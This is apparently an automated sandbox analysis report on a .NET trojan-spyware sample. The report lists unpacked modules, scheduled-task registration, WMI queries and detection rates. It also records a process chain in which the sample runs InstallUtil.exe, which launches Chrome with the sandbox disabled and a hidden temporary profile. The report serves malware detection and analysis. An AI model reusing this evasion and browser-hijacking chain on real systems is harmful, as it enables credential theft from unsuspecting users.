Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069C3C11	0_2_069C3C11
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069C3C20	0_2_069C3C20
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069D4271	0_2_069D4271
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069D0006	0_2_069D0006
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_069D0040	0_2_069D0040
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCDFF0	0_2_06BCDFF0
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC9F18	0_2_06BC9F18
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC5B60	0_2_06BC5B60
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC7900	0_2_06BC7900
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCF5F1	0_2_06BCF5F1
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCE317	0_2_06BCE317
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC0006	0_2_06BC0006
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC6003	0_2_06BC6003
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC606B	0_2_06BC606B
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC0040	0_2_06BC0040
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC0155	0_2_06BC0155
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC5EEB	0_2_06BC5EEB
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC5C21	0_2_06BC5C21
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BCAC51	0_2_06BCAC51
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC5BE2	0_2_06BC5BE2
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC5B50	0_2_06BC5B50
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06BC78F5	0_2_06BC78F5
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C3C6E8	0_2_06C3C6E8
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C43EA0	0_2_06C43EA0
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C43E90	0_2_06C43E90
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C44322	0_2_06C44322
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06CAEAF8	0_2_06CAEAF8
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C90040	0_2_06C90040
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06C90006	0_2_06C90006
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Code function: 0_2_06CAE5E0	0_2_06CAE5E0

Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003FF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDttxonrsibz.dll" vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1378430771.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWqwulvr.exe" vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1388786989.0000000003E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1390912360.00000000063A0000.00000004.08000000.00040000.00000008.sdmp	Binary or memory string: OriginalFilenameDttxonrsibz.dll" vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1392192788.0000000006BD0000.00000004.08000000.00040000.00000008.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.00000000029A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.00000000030CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWqwulvr.exe" vs BSN100357-HHGBM100002525.exe
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1390243145.0000000005900000.00000004.08000000.00040000.00000008.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs BSN100357-HHGBM100002525.exe

Source: BSN100357-HHGBM100002525.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BSN100357-HHGBM100002525.exe.5900000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@57/1@11/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\3591064d5e2136f445c6fac02356d1af

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Temp\aznorh3w.y1u

Jump to behavior

Source: BSN100357-HHGBM100002525.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: BSN100357-HHGBM100002525.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000009.00000003.1640585351.0000610C019AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 00000009.00000003.1449176438.0000610C009E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: chrome.exe, 00000009.00000003.1640585351.0000610C019AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';

Source: BSN100357-HHGBM100002525.exe	Virustotal: Detection: 38%
Source: BSN100357-HHGBM100002525.exe	ReversingLabs: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe "C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe"
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2400 /prefetch:3
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-fre --no-default-browser-check --no-first-run --no-sandbox --allow-no-sandbox-job --disable-gpu --mute-audio --disable-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u\Crashpad --metrics-dir=C:\Users\user\AppData\Local\Temp\aznorh3w.y1u --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=134.0.6998.36 --initial-client-data=0x104,0x108,0x10c,0x100,0x84,0x7ff8eb2d4f38,0x7ff8eb2d4f44,0x7ff8eb2d4f50	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:2	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2400 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --no-pre-read-main-dll --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144219944 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144566293 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --extension-process --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144577987 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=3856 /prefetch:2	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=144610676 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=149773176 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=5516 /prefetch:1	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Local\Temp\aznorh3w.y1u" --extension-process --enable-dinosaur-easter-egg-alt-images --no-pre-read-main-dll --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --time-ticks-at-unix-epoch=-1750330589133692 --launch-time-ticks=165262386 --field-trial-handle=2424,i,16766531400258070031,17892965288824681517,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:2	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BSN100357-HHGBM100002525.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
